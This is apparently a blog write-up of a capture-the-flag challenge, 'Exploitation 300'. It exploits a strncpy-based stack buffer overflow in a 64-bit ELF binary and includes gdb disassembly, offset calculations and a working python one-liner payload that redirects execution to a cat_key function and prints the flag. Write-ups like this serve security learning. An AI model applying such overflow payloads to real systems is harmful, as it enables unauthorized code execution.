Exploitation 300 is also a ELF 64-bit LSB executable. Vulnerability is a classic buffer overflow, we have to overwrite saved $rip with the address of cat_key function to print the flag. The binary uses strncpy() to copy data into buffer $rbp-0x110. The vulnerability is that we can control the arguments used by strncpy(), source buffer and the number of bytes to be copied.
0x00000000004006a6 <+61>: callq 0x400550 <atoi@plt> // argv[1] 0x00000000004006ab <+66>: mov %eax,-0x8(%rbp) // return value 0x00000000004006ae <+69>: mov -0x120(%rbp),%rax 0x00000000004006b5 <+76>: add $0x10,%rax 0x00000000004006b9 <+80>: mov (%rax),%rax 0x00000000004006bc <+83>: mov %rax,%rdi 0x00000000004006bf <+86>: mov $0x0,%eax 0x00000000004006c4 <+91>: callq 0x400550 <atoi@plt> // argv[2] 0x00000000004006c9 <+96>: mov %eax,-0x4(%rbp) // return value 0x00000000004006cc <+99>: mov -0x4(%rbp),%eax 0x00000000004006cf <+102>: movslq %eax,%rdx 0x00000000004006d2 <+105>: mov -0x8(%rbp),%eax 0x00000000004006d5 <+108>: cltq 0x00000000004006d7 <+110>: shl $0x3,%rax // shl by 3 ie %rax * 2^3 ie (%rax = %rax * 8) 0x00000000004006db <+114>: add -0x120(%rbp),%rax // points into argv array based on argv[1] 0x00000000004006e2 <+121>: mov (%rax),%rcx 0x00000000004006e5 <+124>: lea -0x110(%rbp),%rax 0x00000000004006ec <+131>: mov %rcx,%rsi 0x00000000004006ef <+134>: mov %rax,%rdi 0x00000000004006f2 <+137>: callq 0x400560 <strncpy@plt> (gdb) p/x &cat_key $1 = 0x400654We need 280 bytes to overwrite saved $rbp and 288 bytes to overwrite saved $rip. Saved $rip is the address of __libc_start_main at address 0x00007fffxxxxxxxx. So this is our final payload
$ /levels/level200/level200 3 286 `python -c 'print "A"*280+"\x54\x06\x40\x00\x00\x00"'` You entred : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT @ key is : b9240c45d606dc90d0df83f9818b59cd
No comments :
Post a Comment